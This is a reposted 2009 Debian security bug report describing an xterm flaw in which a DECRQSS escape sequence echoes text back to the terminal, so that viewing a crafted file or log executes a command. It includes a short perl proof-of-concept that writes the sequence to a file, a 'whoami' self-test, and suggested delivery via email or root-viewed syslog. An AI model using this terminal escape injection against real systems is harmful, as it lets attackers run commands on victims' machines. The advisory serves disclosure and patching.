debianxterm-weakness.txt

Posted on 07 January 2009

Package: xterm Version: 222-1etch2 Severity: grave Tags: security patch Justification: user security hole DECRQSS Device Control Request Status String "DCS $ q" simply echoes (responds with) invalid commands. For example, perl -e 'print "eP$q bad-command e\"' would run bad-command. Exploitability is the same as for the "window title reporting" issue in DSA-380: include the DCS string in an email message to the victim, or arrange to have it in syslog to be viewed by root. Original: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 Test: perl -e 'print "eP$q whoami e\"' > bla.log cat bla.log If whoami gets executed you should update. So stop using cat or more ;) Rembrandt

TOP

Malware :

Backdoor:Win32/Heloag.A
Exploit:Win32/CVE-2011-3402
Trojan:Win32/Obfac
Exploit:Win32/Pdfjsc.YP
TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20